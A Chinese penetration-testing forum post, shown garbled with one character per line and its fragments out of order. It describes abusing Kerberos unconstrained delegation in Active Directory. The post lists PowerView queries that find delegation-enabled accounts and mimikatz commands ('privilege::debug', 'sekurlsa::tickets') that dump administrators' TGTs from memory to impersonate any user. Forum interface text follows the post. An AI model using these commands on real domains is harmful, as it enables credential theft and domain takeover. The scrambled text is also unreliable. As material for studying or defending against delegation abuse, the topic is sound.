没
有
t
r
u
s
t
e
d
_
f
o
r
_
d
e
l
e
g
a
t
i
o
n
,
若
有
,
则
说
明
开
启
了
非
约
束
性
委
派
查
询
非
约
束
委
派
机
器
账
户
则
用
2
.
非
约
束
性
委
派
的
攻
击
仅
能
基
于
机
器
账
户
如
果
我
们
获
得
了
一
个
非
约
束
性
委
派
账
户
,
我
们
就
可
以
通
过
收
集
内
存
中
的
t
g
t
达
到
任
意
用
户
访
问
的
目
的
。
在
被
控
制
的
非
约
束
性
委
派
机
器
上
使
用
m
i
m
i
k
a
t
z
。
提
权
查
看
本
机
所
有
票
据
通
过
以
上
命
令
获
取
票
据
,
如
果
管
理
员
访
问
了
本
机
的
一
些
服
务
,
那
么
它
的
T
G
T
就
会
被
截
获
放
入
内
存
。
我
们
模
拟
管
理
员
调
用
非
约
束
性
委
派
机
的
s
m
b
服
务
G
e
t
-
N
e
t
U
s
e
r
-
U
n
c
o
n
s
t
r
a
i
n
e
d
-
D
o
m
a
i
n
d
e
1
a
y
.
c
o
m
G
e
t
-
d
o
m
a
i
n
c
o
m
p
u
t
e
r
-
u
n
c
o
n
s
t
r
a
i
n
e
d
-
d
o
m
a
i
n
c
o
n
s
t
.
c
o
m
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
s
e
k
u
r
l
s
a
:
:
t
i
c
k
e
t
s
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试